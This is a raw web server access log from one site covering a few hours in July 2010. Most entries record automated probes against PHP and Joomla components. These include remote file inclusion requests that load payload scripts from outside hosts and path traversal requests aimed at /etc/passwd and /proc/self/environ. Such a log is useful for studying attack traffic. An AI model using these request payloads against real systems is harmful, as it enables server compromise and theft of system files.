91.214.46.25 - - [28/Jul/2010:09:06:06 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
92.243.84.187 - - [28/Jul/2010:09:13:20 -0700] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 - "http://www.redneckmba.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:09:16:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.18.213.162 - - [28/Jul/2010:09:32:04 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
91.212.226.137 - - [28/Jul/2010:09:47:33 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.redneckmba.com"
76.13.123.194 - - [28/Jul/2010:09:53:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
211.206.120.196 - - [28/Jul/2010:09:54:16 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
211.206.120.196 - - [28/Jul/2010:09:54:16 -0700] "GET /index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
211.206.120.196 - - [28/Jul/2010:09:54:17 -0700] "GET /logs/index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.107 - - [28/Jul/2010:09:57:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.129.119.47 - - [28/Jul/2010:09:58:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
74.55.73.74 - - [28/Jul/2010:10:04:09 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [28/Jul/2010:10:04:09 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
81.21.78.22 - - [28/Jul/2010:10:05:02 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [28/Jul/2010:10:05:03 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.206 - - [28/Jul/2010:10:21:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
218.234.23.94 - - [28/Jul/2010:10:28:50 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [28/Jul/2010:10:28:50 -0700] "GET /?_PHPLIB[libdir]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [28/Jul/2010:10:28:50 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [28/Jul/2010:10:30:45 -0700] "GET /?_PHPLIB[libdir]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [28/Jul/2010:10:30:45 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [28/Jul/2010:10:30:45 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:10:37:28 -0700] "GET /logs/access.log%20%20/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:10:37:29 -0700] "GET ////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:10:37:29 -0700] "GET /logs/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.46.235.146 - - [28/Jul/2010:10:39:56 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.alicescatering.com/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
200.46.235.146 - - [28/Jul/2010:10:39:56 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.alicescatering.com/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
200.46.235.146 - - [28/Jul/2010:10:43:45 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.alicescatering.com/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
200.46.235.146 - - [28/Jul/2010:10:43:45 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.alicescatering.com/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
76.13.114.105 - - [28/Jul/2010:10:56:24 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.196.169.109 - - [28/Jul/2010:10:57:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
125.176.223.185 - - [28/Jul/2010:11:17:53 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
188.127.248.175 - - [28/Jul/2010:11:19:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
209.97.216.92 - - [28/Jul/2010:11:21:46 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:21:50 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:21:55 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
209.97.216.92 - - [28/Jul/2010:11:24:10 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.97.216.92 - - [28/Jul/2010:11:24:10 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.97.216.92 - - [28/Jul/2010:11:24:10 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:24:25 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:24:26 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
74.50.85.229 - - [28/Jul/2010:11:25:11 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.123.195 - - [28/Jul/2010:11:26:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [28/Jul/2010:11:31:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:31:38 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:31:38 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
116.30.161.162 - - [28/Jul/2010:11:38:09 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
221.120.250.73 - - [28/Jul/2010:11:38:34 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.73 - - [28/Jul/2010:11:38:34 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.73 - - [28/Jul/2010:11:38:34 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:41:11 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:41:12 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:41:14 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:41:16 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.127.248.175 - - [28/Jul/2010:11:42:03 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [28/Jul/2010:11:42:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [28/Jul/2010:11:42:04 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:42:59 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [28/Jul/2010:11:43:02 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
74.50.85.229 - - [28/Jul/2010:11:43:21 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
200.46.235.146 - - [28/Jul/2010:11:43:35 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.alicescatering.com/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
74.50.85.229 - - [28/Jul/2010:11:44:21 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
116.126.87.166 - - [28/Jul/2010:11:51:36 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
116.126.87.166 - - [28/Jul/2010:11:52:08 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
184.73.83.250 - - [28/Jul/2010:11:53:01 -0700] "HEAD / HTTP/1.1" 200 0 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8" "www.redneckmba.com"
184.73.83.250 - - [28/Jul/2010:11:53:04 -0700] "GET / HTTP/1.1" 200 779 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8" "www.redneckmba.com"
76.13.114.105 - - [28/Jul/2010:12:01:34 -0700] "GET /blog/?feed=rss2 HTTP/1.0" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
78.110.50.110 - - [28/Jul/2010:12:03:41 -0700] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.110 - - [28/Jul/2010:12:03:41 -0700] "GET /logs////components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.110 - - [28/Jul/2010:12:03:41 -0700] "GET /logs/access.log%20%20////components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.110 - - [28/Jul/2010:12:21:13 -0700] "GET /logs/access.log////components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
112.104.67.47 - - [28/Jul/2010:12:36:42 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
66.163.171.207 - - [28/Jul/2010:12:40:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:43:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:46:22 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:46:22 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:46:23 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:48:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
72.193.168.245 - - [28/Jul/2010:12:49:38 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
76.117.139.218 - - [28/Jul/2010:12:50:00 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:54 -0700] "GET /logs/access.log/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:54 -0700] "GET /logs/access.log/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:54 -0700] "GET /index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:54 -0700] "GET /index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:54 -0700] "GET /logs/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:54 -0700] "GET /logs/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:56 -0700] "GET /logs/access.log/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:56 -0700] "GET /index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
69.94.102.40 - - [28/Jul/2010:12:49:57 -0700] "GET /logs/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
58.56.108.35 - - [28/Jul/2010:12:50:00 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
24.46.146.104 - - [28/Jul/2010:12:50:09 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
71.163.34.127 - - [28/Jul/2010:12:50:10 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
70.82.177.135 - - [28/Jul/2010:12:51:27 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
98.208.231.7 - - [28/Jul/2010:12:51:56 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
72.193.168.245 - - [28/Jul/2010:12:51:49 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
24.155.38.143 - - [28/Jul/2010:12:52:00 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
76.117.139.218 - - [28/Jul/2010:12:52:01 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
72.64.168.175 - - [28/Jul/2010:12:52:12 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
72.193.168.245 - - [28/Jul/2010:12:52:30 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
70.179.32.56 - - [28/Jul/2010:12:52:37 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
58.56.108.35 - - [28/Jul/2010:12:52:48 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
72.64.168.175 - - [28/Jul/2010:12:53:01 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
70.82.177.135 - - [28/Jul/2010:12:52:52 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
58.56.108.35 - - [28/Jul/2010:12:53:38 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
72.193.168.245 - - [28/Jul/2010:12:54:08 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
24.155.38.143 - - [28/Jul/2010:12:54:14 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
76.117.139.218 - - [28/Jul/2010:12:54:36 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
98.208.231.7 - - [28/Jul/2010:12:55:25 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:59:48 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:59:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [28/Jul/2010:12:59:48 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
76.13.123.194 - - [28/Jul/2010:13:02:24 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [28/Jul/2010:13:04:37 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.108.64.192 - - [28/Jul/2010:13:04:47 -0700] "GET /logs/access_100614.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
125.176.223.185 - - [28/Jul/2010:13:05:18 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
58.248.90.193 - - [28/Jul/2010:13:06:42 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
